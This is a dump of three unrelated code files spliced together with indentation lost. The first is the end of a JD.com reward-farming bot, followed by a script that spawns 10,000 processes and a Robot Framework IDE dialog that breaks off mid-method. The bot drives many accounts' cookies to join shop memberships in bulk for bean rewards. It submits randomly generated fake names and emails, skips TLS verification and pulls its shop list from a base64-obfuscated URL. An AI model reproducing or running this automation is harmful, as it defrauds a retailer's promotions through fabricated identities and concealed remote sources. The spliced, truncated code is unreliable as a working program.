# Fix some memory-feature issues, e.g. the cumulative bean total showing 0
def isMemoryEnable():
global memoryJson
memoryJson = getMemory()
# Load the memory state
def getMemory():
"""
:return: memoryJson
"""
if os.path.exists(pwd + "log/memory.json"):
with open(pwd + "log/memory.json", "r", encoding="utf-8") as f:
memoryJson = json.load(f)
if len(memoryJson) > 0:
return memoryJson
else:
pass
def rmCount():
if os.path.exists(pwd + "log/入会汇总.txt"):
os.remove(pwd + "log/入会汇总.txt")
if os.path.exists(pwd + "log/memory.json"):
os.remove(pwd + "log/memory.json")
# Decide whether the memory feature should be applied
def isMemory(memorylabel, startNum1, startNum2, midNum, endNum, pinNameList):
"""
:param memorylabel: memory flag
:param startNum1: default start position for thread 1
:param startNum2: default start position for thread 2
:param midNum: default end position for thread 1
:param endNum: default end position for thread 2
:return: startNum1, startNum2, memorylabel
"""
if memory == True and memorylabel == 0:
try:
memoryJson = getMemory()
if memoryJson['allShopidNum'] == endNum:
currUserLabel = 0
if memoryJson['allUserCount'] == allUserCount:
for u in pinNameList:
if memoryJson['currUser1'] == u:
currUserLabel += 1
elif memoryJson['currUser2'] == u:
currUserLabel += 1
if memoryJson['currUser1'] == memoryJson['currUser2']:
currUserLabel = 2
if currUserLabel < 2:
print("通知:检测到您配置的CK有变更,本次记忆功能不生效。")
rmCount()
return startNum1, startNum2, memorylabel
if memoryJson['t1_startNum'] + 1 == midNum and memoryJson['t2_startNum'] + 1 == endNum:
print(
f"\n上次已完成所有shopid,\n\nPs:您可以关注公众号或TG频道获取最新shopid。\n公众号: TopStyle\n电报TG:https://t.me/TopStyle2021\n\n请输入 0 或 1\n0 : 退出。\n1 : 重新跑一次,以防有漏")
try:
getyourNum = int(input("正在等待您的选择:"))
if getyourNum == 1:
print("Ok,那就重新跑一次~")
rmCount()
memorylabel = 1
return startNum1, startNum2, memorylabel
elif getyourNum == 0:
print("Ok,已退出~")
time.sleep(10)
exit(0)
except:
# print("Error: 您的输入有误!已退出。")
exitCodeFun(3)
else:
isMemoryEnable()
if memoryJson['t1_startNum']:
startNum1 = memoryJson['t1_startNum']
message(f"已启用记忆功能 memory= True,线程1从第【{startNum1}】店铺开始")
if memoryJson['t2_startNum']:
startNum2 = memoryJson['t2_startNum']
message(f"已启用记忆功能 memory= True,线程2从第【{startNum2}】店铺开始")
memorylabel = 1
return startNum1, startNum2, memorylabel
else:
message("通知:检测到您配置的CK有变更,本次记忆功能不生效。")
rmCount()
return startNum1, startNum2, memorylabel
else:
message("通知:检测到shopid有更新,本次记忆功能不生效。")
rmCount()
memorylabel = 1
return startNum1, startNum2, memorylabel
except Exception as e:
memorylabel = 1
return startNum1, startNum2, memorylabel
else:
rmCount()
memorylabel = 1
return startNum1, startNum2, memorylabel
# Get the venderId
def getVenderId(shopId, headers):
"""
:param shopId:
:param headers
:return: venderId
"""
url = 'https://mall.jd.com/index-{0}.html'.format(shopId)
resp = requests.get(url=url, verify=False, headers=headers, timeout=60)
resulttext = resp.text
r = re.compile(r'shopId=\d+&id=(\d+)"')
venderId = r.findall(resulttext)
return venderId[0]
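# Illustrative (assumption based on the regex above): the shop page HTML is expected to contain
# a link of the form '...shopId=<digits>&id=<venderId>"', and the captured venderId digits are returned.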
# Query the membership gift package
def getShopOpenCardInfo(venderId, headers, shopid, userName, user_num):
"""
:param venderId:
:param headers:
:return: activityId, getBean; or 0: no bean reward, 1: reward but already a member, 2: record-only mode (no join)
"""
num1 = string.digits
v_num1 = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(
random.sample(num1, 4))  # randomly generate a short numeric string
url = 'https://api.m.jd.com/client.action?appid=jd_shop_member&functionId=getShopOpenCardInfo&body=%7B%22venderId%22%3A%22{2}%22%2C%22channel%22%3A406%7D&client=H5&clientVersion=9.2.0&uuid=&jsonp=jsonp_{0}_{1}'.format(
timestamp, v_num1, venderId)
resp = requests.get(url=url, verify=False, headers=headers, timeout=60)
time.sleep(sleepNum)
resulttxt = resp.text
r = re.compile(r'jsonp_.*?\((.*?)\)\;', re.M | re.S | re.I)
result = r.findall(resulttxt)
cardInfo = json.loads(result[0])
venderCardName = cardInfo['result']['shopMemberCardInfo']['venderCardName']  # shop name
if user_num == 1:
printinfo(f"\t└查询入会礼包【{venderCardName}】", printlog)
openCardStatus = cardInfo['result']['userInfo']['openCardStatus']  # whether already a member
interestsRuleList = cardInfo['result']['interestsRuleList']
if interestsRuleList == None:
if user_num == 1:
printinfo("\t\t└查询该店入会没有送豆,不入会", printlog)
return 0, 0
try:
if len(interestsRuleList) > 0:
for i in interestsRuleList:
if "京豆" in i['prizeName']:
getBean = int(i['discountString'])
activityId = i['interestsInfo']['activityId']
context = "{0}".format(shopid)
outfile(f"shopid-{today}.txt", context, False) # 记录所有送豆的shopid
in_url = 'https://shop.m.jd.com/?shopId={}'.format(shopid)
url = 'https://shopmember.m.jd.com/member/memberCloseAccount?venderId={}'.format(venderId)
context = "[{0}]:入会{2}豆店铺【{1}】\n\t加入会员:{4}\n\t解绑会员:{3}".format(nowtime(), venderCardName, getBean,
url, in_url) # 记录
if user_num == 1:
outfile("入会汇总.txt", context, False)
if getBean >= openCardBean:  # check whether the bean reward meets your threshold
print(f"\t└账号{user_num}【{userName}】{venderCardName}:入会赠送【{getBean}豆】,可入会")
context = "{0}".format(shopid)
outfile(f"入会{openCardBean}豆以上的shopid-{today}.txt", context, False)
if onlyRecord == True:
if user_num == 1:
print("已开启仅记录,不入会。")
return 2, 2
if openCardStatus == 1:
url = 'https://shopmember.m.jd.com/member/memberCloseAccount?venderId={}'.format(venderId)
print("\t\t└[账号:{0}]:您已经是本店会员,请注销会员卡24小时后再来~\n注销链接:{1}".format(userName, url))
context = "[{3}]:入会{1}豆,{0}销卡:{2}".format(venderCardName, getBean, url, nowtime())
outfile("可退会账号【{0}】.txt".format(userName), context, False)
return 1, 1
return activityId, getBean
else:
if user_num == 1:
print(f'\t\t└{venderCardName}:入会送【{getBean}】豆少于【{openCardBean}豆】,不入...')
if onlyRecord == True:
if user_num == 1:
print("已开启仅记录,不入会。")
return 2, 2
return 0, openCardStatus
else:
pass
if user_num == 1:
printinfo("\t\t└查询该店入会没有送豆,不入会", printlog)
return 0, 0
else:
return 0, 0
except Exception as e:
print(e)
# Join the membership (open the card)
def bindWithVender(venderId, shopId, activityId, channel, headers):
"""
:param venderId:
:param shopId:
:param activityId:
:param channel:
:param headers:
:return: result : raw join-membership response
"""
num = string.ascii_letters + string.digits
v_name = ''.join(random.sample(num, 10))
num1 = string.digits
v_num1 = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(random.sample(num1, 4))
qq_num = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(
random.sample(num1, 8)) + "@qq.com"
url = 'https://api.m.jd.com/client.action?appid=jd_shop_member&functionId=bindWithVender&body=%7B%22venderId%22%3A%22{4}%22%2C%22shopId%22%3A%22{7}%22%2C%22bindByVerifyCodeFlag%22%3A1%2C%22registerExtend%22%3A%7B%22v_sex%22%3A%22%E6%9C%AA%E7%9F%A5%22%2C%22v_name%22%3A%22{0}%22%2C%22v_birthday%22%3A%221990-03-18%22%2C%22v_email%22%3A%22{6}%22%7D%2C%22writeChildFlag%22%3A0%2C%22activityId%22%3A{5}%2C%22channel%22%3A{3}%7D&client=H5&clientVersion=9.2.0&uuid=&jsonp=jsonp_{1}_{2}'.format(
v_name, timestamp, v_num1, channel, venderId, activityId, qq_num, shopId)
try:
respon = requests.get(url=url, verify=False, headers=headers, timeout=60)
result = respon.text
return result
except Exception as e:
print(e)
# Parse the join result
def getResult(resulttxt, userName, user_num):
r = re.compile(r'jsonp_.*?\((.*?)\)\;', re.M | re.S | re.I)
result = r.findall(resulttxt)
for i in result:
result_data = json.loads(i)
busiCode = result_data['busiCode']
if busiCode == '0':
message = result_data['message']
try:
result = result_data['result']['giftInfo']['giftList']
print(f"\t\t└账号{user_num}【{userName}】:{message}")
for i in result:
print("\t\t\t└{0}:{1} ".format(i['prizeTypeName'], i['discount']))
except:
print(f'\t\t└账号{user_num}【{userName}】:{message}')
return busiCode
else:
print("\t\t└账号{0}【{1}】:{2}".format(user_num, userName, result_data['message']))
return busiCode
def getRemoteShopid():
global shopidList, venderidList
shopidList = []
venderidList = []
url = base64.decodebytes(
b"aHR0cHM6Ly9naXRlZS5jb20vY3VydGlubHYvUHVibGljL3Jhdy9tYXN0ZXIvT3BlbkNhcmQvc2hvcGlkLnR4dA==")
try:
rShopid = gettext(url)
rShopid = rShopid.split("\n")
for i in rShopid:
if len(i) > 0:
shopidList.append(i.split(':')[0])
venderidList.append(i.split(':')[1])
return shopidList, venderidList
except:
print("无法从远程获取shopid")
exitCodeFun(999)
# Read shopid.txt
def getShopID():
shopid_path = pwd + "shopid.txt"
try:
with open(shopid_path, "r", encoding="utf-8") as f:
shopid = f.read()
if len(shopid) > 0:
shopid = shopid.split("\n")
return shopid
else:
print("Error:请检查shopid.txt文件是否正常!\n")
exitCodeFun(2)
except Exception as e:
print("Error:请检查shopid.txt文件是否正常!\n", e)
exitCodeFun(2)
# Progress indicator
def progress_bar(start, end, threadNum):
print("\r", end="")
if threadNum == 2:
start2 = start - midNum
end2 = end - midNum
print("\n###[{1}]:线程{2}【当前进度: {0}%】\n".format(round(start2 / end2 * 100, 2), nowtime(), threadNum))
elif threadNum == 1:
print("\n###[{1}]:线程{2}【当前进度: {0}%】\n".format(round(start / end * 100, 2), nowtime(), threadNum))
sys.stdout.flush()
## Multi-account concurrency
def sss(ii, ck, userName, pinName, endNum, user_num, shopids, threadNum):
if ii % 10 == 0 and ii != 0 and user_num == 1:
progress_bar(ii, endNum, threadNum)
try:
if len(shopids[ii]) > 0:
headers_b = setHeaders(ck, "mall") # 获取请求头
if isRemoteSid:
venderId = venderidList[shopidList.index(shopids[ii])]
else:
venderId = getVenderId(shopids[ii], headers_b) # 获取venderId
time.sleep(sleepNum)  # optionally throttle requests to suit your needs
# memory feature
memoryFun(ii, threadNum, True, pinName, 0, allUserCount)
headers_a = setHeaders(ck, "mh5")
activityId, getBean = getShopOpenCardInfo(venderId, headers_a, shopids[ii], userName, user_num)  # query the membership gift
# returns activityId, getBean; or 0: no beans, 1: beans but already a member, 2: record-only mode (no join)
time.sleep(sleepNum)  # optionally throttle requests per account
if activityId == 0 or activityId == 2:
pass
elif activityId > 10:
headers = setHeaders(ck, "JDApp")
result = bindWithVender(venderId, shopids[ii], activityId, 208, headers)
busiCode = getResult(result, userName, user_num)
if busiCode == '0':
memoryFun(ii, threadNum, False, pinName, getBean, allUserCount)
memoryJson = getMemory()
print(f"账号{user_num}:【{userName}】累计获得:{memoryJson['{}'.format(pinName)]} 京豆")
time.sleep(sleepNum)
else:
pass
except Exception as e:
if user_num == 1:
print(f"【Error】:多账号并发报错,请求过快建议适当调整 sleepNum 参数限制速度 \n{e}")
# Prepared for multi-threaded use
def OpenVipCard(startNum: int, endNum: int, shopids, cookies, userNames, pinNameList, threadNum):
sssLabel = 0
for i in range(startNum, endNum):
user_num = 1
if Concurrent:
if sssLabel == 0 and threadNum == 1:
if DoubleThread:
message("当前模式: 双线程,多账号并发运行")
else:
message("当前模式: 单线程,多账号并发运行")
sssLabel = 1
threads = []
for ck, userName, pinName in zip(cookies, userNames, pinNameList):
tt = TaskThread(sss, args=(i, ck, userName, pinName, endNum, user_num, shopids, threadNum))
threads.append(tt)
tt.start()
user_num += 1
time.sleep(sleepNum)
for t in threads:
t.join()
time.sleep(sleepNum)
else:
if sssLabel == 0 and threadNum == 1:
if DoubleThread:
message("当前模式: 双线程,单账号运行")
else:
message("当前模式: 单线程,单账号运行")
sssLabel = 1
activityIdLabel = 0
for ck, userName, pinName in zip(cookies, userNames, pinNameList):
if i % 10 == 0 and i != 0:
progress_bar(i, endNum, threadNum)
try:
if len(shopids[i]) > 0:
headers_b = setHeaders(ck, "mall") # 获取请求头
venderId = getVenderId(shopids[i], headers_b) # 获取venderId
time.sleep(sleepNum)  # optionally throttle requests per account
# memory feature
memoryFun(i, threadNum, True, pinName, 0, allUserCount)
if activityIdLabel == 0:
s = random.randint(0, allUserCount - 1)
headers_a = setHeaders(cookies[s], "mh5")
activityId, getBean = getShopOpenCardInfo(venderId, headers_a, shopids[i], userName,
user_num) # 获取入会礼包结果
# returns activityId, getBean; or 0: no beans, 1: beans but already a member, 2: record-only mode (no join)
time.sleep(sleepNum)  # optionally throttle requests per account
if activityId == 0 or activityId == 2:
break
elif activityId == 1:
user_num += 1
continue
elif activityId > 10:
activityIdLabel = 1
headers = setHeaders(ck, "JDApp")
result = bindWithVender(venderId, shopids[i], activityId, 208, headers)
busiCode = getResult(result, userName, user_num)
if busiCode == '0':
memoryFun(i, threadNum, False, pinName, getBean, allUserCount)
memoryJson = getMemory()
print(f"账号{user_num}:【{userName}】累计获得:{memoryJson['{}'.format(pinName)]} 京豆")
time.sleep(sleepNum)
else:
break
except Exception as e:
user_num += 1
print(e)
continue
user_num += 1
# start
def start():
global allUserCount
print(scriptHeader)
outfile("Readme.md", readmes, True)
isUpdate()
global endShopidNum, midNum, allUserCount
if isRemoteSid:
message("已启用远程获取shopid")
allShopid, venderidList = getRemoteShopid()
else:
message("从本地shopid.txt获取shopid")
allShopid = getShopID()
allShopid = list(set(allShopid))
endShopidNum = len(allShopid)
midNum = int(endShopidNum / 2)
message("获取到店铺数量: {}".format(endShopidNum))
message(f"您已设置入会条件:{openCardBean} 京豆")
print("获取账号...")
cookies, userNames, pinNameList = iscookie()
allUserCount = len(cookies)
message("共{}个有效账号".format(allUserCount))
memorylabel = 0
startNum1 = 0
startNum2 = midNum
starttime = time.perf_counter()  # start timing
if endShopidNum > 1 and DoubleThread:
# If the memory feature is enabled, resume from the last recorded position
startNum1, startNum2, memorylabel = isMemory(memorylabel, startNum1, startNum2, midNum, endShopidNum,
pinNameList)
# Multi-threaded section
threads = []
t1 = Thread(target=OpenVipCard, args=(startNum1, midNum, allShopid, cookies, userNames, pinNameList, 1))
threads.append(t1)
t2 = Thread(target=OpenVipCard, args=(startNum2, endShopidNum, allShopid, cookies, userNames, pinNameList, 2))
threads.append(t2)
try:
for t in threads:
t.daemon = True  # setDaemon() is deprecated
t.start()
for t in threads:
t.join()
isSuccess = True
progress_bar(1, 1, 1)
progress_bar(1, 1, 2)
except:
isSuccess = False
elif endShopidNum == 1 or not DoubleThread:
startNum1, startNum2, memorylabel = isMemory(memorylabel, startNum1, startNum2, midNum, endShopidNum,
pinNameList)
OpenVipCard(startNum1, endShopidNum, allShopid, cookies, userNames, pinNameList, 1)
isSuccess = True
else:
message("获取到shopid数量为0")
exitCodeFun(9)
endtime = time.perf_counter()  # stop timing
if os.path.exists(pwd + "log/memory.json"):
memoryJson = getMemory()
n = 1
message("\n###【本次统计 {}】###\n".format(nowtime()))
all_get_bean = 0
for name, pinname in zip(userNames, pinNameList):
try:
userCountBean = memoryJson['{}'.format(pinname)]
successJoin = memoryJson['{}_ok'.format(pinname)]
message(f"账号{n}:【{name}】\n\t└成功入会【{successJoin}】个,收获【{userCountBean}】京豆")
all_get_bean += userCountBean
except Exception as e:
message(f"账号{n}:【{name}】\n\t└成功入会【0】个,收获【0】京豆")
n += 1
message(f"\n本次总累计获得:{all_get_bean} 京豆")
time.sleep(1)
message("\n------- 入会总耗时 : %.03f 秒 seconds -------" % (endtime - starttime))
print("{0}\n{1}\n{2}".format("*" * 30, scriptHeader, remarks))
send("【JD入会领豆】", message_info)
exitCodeFun(0)
if __name__ == '__main__':
start()
|
main.py
|
#!/usr/bin/env python3
from multiprocessing import Process
from time import sleep
def snooze():
sleep(10)
def main():
processes = []
for i in range(10000):
process = Process(target=snooze)
process.start()
processes.append(process)
for process in processes:
process.join()
if __name__ == "__main__":
main()
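# Note: this deliberately spawns 10,000 OS processes at once, which can exhaust process or
# file-descriptor limits on some systems. A bounded sketch with the same per-task behaviour:
#
#   from multiprocessing import Pool
#
#   def snooze_n(_):
#       sleep(10)
#
#   with Pool(processes=8) as pool:
#       pool.map(snooze_n, range(10000))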
|
review.py
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import wx
import wx.lib.mixins.listctrl as listmix
import time
import re
from robotide.context import IS_MAC
from robotide.ui.searchdots import DottedSearch
from robotide.widgets import ButtonWithHandler, Label
from robotide.spec.iteminfo import LibraryKeywordInfo
from robotide.usages.commands import FindUsages
from robotide.controller.filecontrollers import TestCaseFileController, ResourceFileController, TestDataDirectoryController
from threading import Thread
class ReviewDialog(wx.Frame):
def __init__(self, controller, frame):
wx.Frame.__init__(self, frame, title="Search unused keywords", style=wx.SYSTEM_MENU|wx.CAPTION|wx.CLOSE_BOX|wx.CLIP_CHILDREN|wx.FRAME_FLOAT_ON_PARENT)
self.index = 0
self.frame = frame
self._search_model = ResultModel()
self._runner = ReviewRunner(controller, self._search_model)
self._build_ui()
self._make_bindings()
self._set_default_values()
self.CenterOnParent()
def _build_ui(self):
self.SetSize((800,600))
self.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DFACE))
self.SetSizer(wx.BoxSizer(wx.VERTICAL))
self._build_header()
self._build_filter()
self._build_notebook()
self._build_unused_keywords()
self._build_controls()
def _build_header(self):
label_introduction = wx.StaticText(self,
label='This dialog helps you find unused keywords within your opened project.\nIf you want, you can restrict the search to a set of files with the filter.')
label_filter_is = wx.StaticText(self, label='Filter is')
self.label_filter_status = wx.StaticText(self, label='inactive')
header_sizer = wx.BoxSizer(wx.HORIZONTAL)
header_sizer.Add(label_introduction, 0, wx.ALL | wx.EXPAND, 3)
header_sizer.AddStretchSpacer(1)
header_sizer.Add(label_filter_is, 0,
wx.LEFT | wx.TOP | wx.BOTTOM | wx.ALIGN_BOTTOM, 3)
header_sizer.Add(self.label_filter_status, 0,
wx.ALL | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT, 3)
self.Sizer.Add(header_sizer, 0, wx.ALL | wx.EXPAND, 3)
def _build_filter(self):
self._filter_pane = MyCollapsiblePane(self, label="Filter",
style=wx.CP_DEFAULT_STYLE | wx.CP_NO_TLW_RESIZE)
self._filter_input = wx.TextCtrl(self._filter_pane.GetPane(),
size=(-1, 20))
self._filter_regex_switch = wx.CheckBox(self._filter_pane.GetPane(),
wx.ID_ANY, label="Use RegEx")
self._filter_info = wx.StaticText(self._filter_pane.GetPane(),
label='Here you can define one or more strings separated by comma (e.g. common,abc,123).\nThe filter matches if at least one string is part of the filename.\nIf you don\'t enter any strings, all opened files are included')
filter_source_box = wx.StaticBox(self._filter_pane.GetPane(), label="Search")
self._filter_source_testcases = wx.CheckBox(self._filter_pane.GetPane(),
wx.ID_ANY,
label="Test case files")
self._filter_source_resources = wx.CheckBox(self._filter_pane.GetPane(),
wx.ID_ANY,
label="Resource files")
self._filter_mode = wx.RadioBox(self._filter_pane.GetPane(),
label="Mode",
choices=["exclude", "include"])
self._filter_test_button = wx.Button(self._filter_pane.GetPane(),
wx.ID_ANY, 'Test the filter')
filter_box_sizer = wx.BoxSizer(wx.HORIZONTAL)
filter_box_sizer.SetSizeHints(self._filter_pane.GetPane())
filter_source_sizer = wx.StaticBoxSizer(filter_source_box, wx.VERTICAL)
checkbox_border = 0 if IS_MAC else 3
filter_source_sizer.Add(self._filter_source_testcases, 0, wx.ALL, checkbox_border)
filter_source_sizer.Add(self._filter_source_resources, 0, wx.ALL, checkbox_border)
filter_options = wx.BoxSizer(wx.VERTICAL)
filter_options.Add(filter_source_sizer, 0,
wx.BOTTOM | wx.RIGHT | wx.LEFT | wx.EXPAND, 3)
filter_options.Add(self._filter_mode, 0, wx.ALL | wx.EXPAND, 3)
filter_input_sizer = wx.BoxSizer(wx.VERTICAL)
filter_input_sizer.SetMinSize((600, -1))
filter_input_sizer.AddSpacer(10)
filter_input_sizer.Add(self._filter_input, 0, wx.ALL | wx.EXPAND, 3)
filter_input_sizer.Add(self._filter_regex_switch, 0,
wx.ALL | wx.ALIGN_RIGHT, 3)
filter_input_sizer.Add(self._filter_info, 0, wx.ALL | wx.EXPAND, 3)
filter_input_sizer.AddStretchSpacer(1)
filter_controls = wx.BoxSizer(wx.HORIZONTAL)
filter_controls.AddStretchSpacer(1)
filter_controls.Add(self._filter_test_button, 0,
wx.ALL | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT, 3)
filter_input_sizer.Add(filter_controls, 0, wx.ALL | wx.EXPAND, 3)
filter_box_sizer.Add(filter_options, 0, wx.ALL | wx.EXPAND, 3)
filter_box_sizer.Add(filter_input_sizer, 0, wx.ALL | wx.EXPAND, 3)
self._filter_pane.GetPane().SetSizer(filter_box_sizer)
self.Sizer.Add(self._filter_pane, 0, wx.ALL | wx.EXPAND, 3)
def _build_unused_keywords(self):
panel_unused_kw = wx.Panel(self._notebook)
sizer_unused_kw = wx.BoxSizer(wx.VERTICAL)
panel_unused_kw.SetSizer(sizer_unused_kw)
self._unused_kw_list = ResultListCtrl(panel_unused_kw,
style=wx.LC_REPORT)
self._unused_kw_list.InsertColumn(0, "Keyword", width=400)
self._unused_kw_list.InsertColumn(1, "File", width=250)
self._unused_kw_list.SetMinSize((650, 250))
self._unused_kw_list.set_dialog(self)
self._delete_button = wx.Button(panel_unused_kw, wx.ID_ANY,
'Delete marked keywords')
sizer_unused_kw.Add(self._unused_kw_list, 1, wx.ALL | wx.EXPAND, 3)
unused_kw_controls = wx.BoxSizer(wx.HORIZONTAL)
unused_kw_controls.AddStretchSpacer(1)
unused_kw_controls.Add(self._delete_button, 0, wx.ALL | wx.ALIGN_RIGHT,
3)
sizer_unused_kw.Add(unused_kw_controls, 0, wx.ALL | wx.EXPAND, 3)
self._notebook.AddPage(panel_unused_kw, "Unused Keywords")
def _build_controls(self):
self._search_button = ButtonWithHandler(self, 'Search')
self._abort_button = ButtonWithHandler(self, 'Abort')
self._status_label = Label(self, label='')
controls = wx.BoxSizer(wx.HORIZONTAL)
controls.Add(self._search_button, 0, wx.ALL, 3)
controls.Add(self._abort_button, 0, wx.ALL, 3)
controls.Add(self._status_label, 1, wx.ALL | wx.EXPAND, 3)
self.Sizer.Add(controls, 0, wx.ALL | wx.EXPAND, 3)
def _build_notebook(self):
self._notebook = wx.Notebook(self, wx.ID_ANY, style=wx.NB_TOP)
self.Sizer.Add(self._notebook, 1, wx.ALL | wx.EXPAND, 3)
def _make_bindings(self):
self.Bind(wx.EVT_CLOSE, self._close_dialog)
self.Bind(wx.EVT_TEXT, self._update_filter, self._filter_input)
self.Bind(wx.EVT_RADIOBOX, self._update_filter_mode, self._filter_mode)
self.Bind(wx.EVT_CHECKBOX, self._update_filter_source_testcases, self._filter_source_testcases)
self.Bind(wx.EVT_CHECKBOX, self._update_filter_source_resources, self._filter_source_resources)
self.Bind(wx.EVT_BUTTON, self.OnDeletemarkedkeywords, self._delete_button)
self.Bind(wx.EVT_BUTTON, self.OnShowfilestobesearched, self._filter_test_button)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnResultSelected, self._unused_kw_list)
self.Bind(wx.EVT_CHECKBOX, self._update_filter_regex, self._filter_regex_switch)
self.Bind(wx.EVT_COLLAPSIBLEPANE_CHANGED, self._toggle_filter_active, self._filter_pane)
def _set_default_values(self):
check_testcases = True
self._filter_source_testcases.SetValue(check_testcases)
self._runner.set_filter_source_testcases(check_testcases)
check_resources = True
self._filter_source_resources.SetValue(check_resources)
self._runner.set_filter_source_resources(check_resources)
filter_mode = 0
self._filter_mode.SetSelection(filter_mode)
self._runner.set_filter_mode(filter_mode == 0)
use_regex = False
self._filter_regex_switch.SetValue(use_regex)
self._runner.set_filter_use_regex(use_regex)
filter_string = ''
self._filter_input.ChangeValue(filter_string)
self._runner.parse_filter_string(filter_string)
self._disable_filter()
self._abort_button.Disable()
self._delete_button.Disable()
def _update_filter(self, event):
self._runner.parse_filter_string(event.GetString())
def _update_filter_mode(self, event):
self._runner.set_filter_mode(event.GetInt() == 0)
def _update_filter_source_testcases(self, event):
self._runner.set_filter_source_testcases(event.Checked())
def _update_filter_source_resources(self, event):
self._runner.set_filter_source_resources(event.Checked())
def _update_filter_regex(self, event):
self._runner.set_filter_use_regex(event.Checked())
def _toggle_filter_active(self, event):
if event.GetCollapsed():
self._disable_filter()
else:
self._enable_filter()
self._filter_pane.on_change(event)
def _disable_filter(self):
self._runner.set_filter_active(False)
self.label_filter_status.SetLabel('inactive')
self.label_filter_status.SetForegroundColour(wx.RED)
def _enable_filter(self):
self._runner.set_filter_active(True)
self.label_filter_status.SetLabel('active')
self.label_filter_status.SetForegroundColour((0,200,0))
def OnSearch(self, event):
self.begin_searching()
self._runner._run_review()
def OnAbort(self, event):
self.end_searching()
def OnDeletemarkedkeywords(self, event):
item = self._unused_kw_list.get_next_checked_item()
while item:
index = item[0]
kw = item[1]
listitem = item[2]
item_id = listitem.GetData()
self._unused_kw_list.DeleteItem(index)
self._unused_kw_list.RemoveClientData(item_id)
kw.delete()
self._update_notebook_text("Unused Keywords (%d)" % self._unused_kw_list.GetItemCount())
self.update_status("")
item = self._unused_kw_list.get_next_checked_item()
self.item_in_kw_list_checked()
def OnShowfilestobesearched(self, event):
df_list = self._runner._get_datafile_list()
if not df_list:
string_list = "(None)"
else:
string_list = "\n".join(df.name for df in df_list)
message = "Keywords of the following files will be included in the search:\n\n" + string_list
wx.MessageDialog(self, message=message, caption="Included files", style=wx.OK|wx.ICON_INFORMATION).ShowModal()
def OnResultSelected(self, event):
self.frame.tree.select_node_by_data(self._unused_kw_list.GetClientData(event.GetData()))
def item_in_kw_list_checked(self):
if self._unused_kw_list.get_number_of_checked_items() > 0:
self._delete_button.Enable()
else:
self._delete_button.Disable()
def show_dialog(self):
if not self.IsShown():
self._clear_search_results()
self.Show()
self.Raise()
def _close_dialog(self, event):
if self._search_model.searching:
self.end_searching()
if event.CanVeto():
self.Hide()
else:
self.Destroy()
def begin_searching(self):
self._abort_button.Enable()
self._search_button.Disable()
self._filter_pane.Disable()
self._unused_kw_list.Disable()
self._clear_search_results()
self._dots = DottedSearch(self, self._update_unused_keywords)
self._dots.start()
def _clear_search_results(self):
self._unused_kw_list.ClearAll()
self._update_notebook_text('Unused Keywords')
self._delete_button.Disable()
self._status_label.SetLabel('')
self._search_model.clear_search()
def add_result_unused_keyword(self, index, keyword):
keyword_info = keyword.info
if wx.VERSION >= (3, 0, 3, ''): # DEBUG wxPhoenix
self._unused_kw_list.InsertItem(index, keyword_info.name)
else:
self._unused_kw_list.InsertStringItem(index, keyword_info.name)
filename = os.path.basename(keyword_info.item.source)
if wx.VERSION >= (3, 0, 3, ''): # DEBUG wxPhoenix
self._unused_kw_list.SetItem(index, 1, filename)
else:
self._unused_kw_list.SetStringItem(index, 1, filename)
self._unused_kw_list.SetItemData(index, index)
self._unused_kw_list.SetClientData(index, keyword)
def _update_unused_keywords(self, dots):
count_before = self._unused_kw_list.GetItemCount()
for index, kw in list(enumerate(self._search_model.keywords))[count_before:]:
self.add_result_unused_keyword(index, kw)
self.update_status("Searching.%s \t- %s" % (dots, self._search_model.status))
if not self._search_model.searching:
self.end_searching()
def _update_notebook_text(self, new_text):
self._notebook.SetPageText(0, new_text)
def update_status(self, message, increase=1):
self._status_label.SetLabel(message)
def end_searching(self):
self._dots.stop()
self._search_model.end_search()
self._update_notebook_text('Unused Keywords (%d)' % (self._unused_kw_list.GetItemCount()))
self.update_status("Search finished - Found %d Unused Keywords" % (self._unused_kw_list.GetItemCount()))
self._unused_kw_list.Enable()
self._abort_button.Disable()
self._filter_pane.Enable()
self._search_button.Enable()
def send_radiobox_event(self, mycontrol):
cmd = wx.CommandEvent(wx.EVT_RADIOBOX.evtType[0])
cmd.SetEventObject(mycontrol)
cmd.SetId(mycontrol.GetId())
mycontrol.GetEventHandler().ProcessEvent(cmd)
class ReviewRunner(object):
def __init__(self, controller, model):
self._controller = controller
self._model = model
self._filter = ResultFilter()
def set_filter_active(self, value):
self._filter.active = value
def set_filter_mode(self, exclude):
self._filter.excludes = exclude
def set_filter_source_testcases(self, value):
self._filter.check_testcases = value
def set_filter_source_resources(self, value):
self._filter.check_resources = value
def set_filter_use_regex(self, value):
self._filter.use_regex = value
def parse_filter_string(self, filter_string):
self._filter.set_strings(filter_string.split(','))
def _get_datafile_list(self):
return [df for df in self._controller.datafiles if self._filter.include_file(df)]
def _run_review(self):
self._model.begin_search()
Thread(target=self._run).start()
def _run(self):
self._stop_requested = False
self._model.status = 'listing datafiles'
for df in self._get_datafile_list():
libname = os.path.basename(df.source).rsplit('.', 1)[0]
self._model.status = 'searching from '+libname
for keyword in df.keywords:
time.sleep(0) # GIVE SPACE TO OTHER THREADS -- Thread.yield in Java
self._model.status = "%s.%s" % (libname, keyword.name)
if not self._model.searching:
break
# Check if it is unused
if not isinstance(keyword, LibraryKeywordInfo) and keyword.name:
if self._is_unused(keyword):
self._model.add_unused_keyword(keyword)
if not self._model.searching:
break
self._model.end_search()
def _is_unused(self, keyword):
try:
next(self._controller.execute(FindUsages(keyword.name, keyword_info=keyword.info)))
return False
except StopIteration:
return True
class ResultFilter(object):
def __init__(self):
self._strings = []
self.excludes = True
self.check_testcases = True
self.check_resources = True
self.use_regex = False
self.active = False
def set_strings(self, strings):
self._strings = [s.strip() for s in strings if s.strip()]
def include_file(self, datafile):
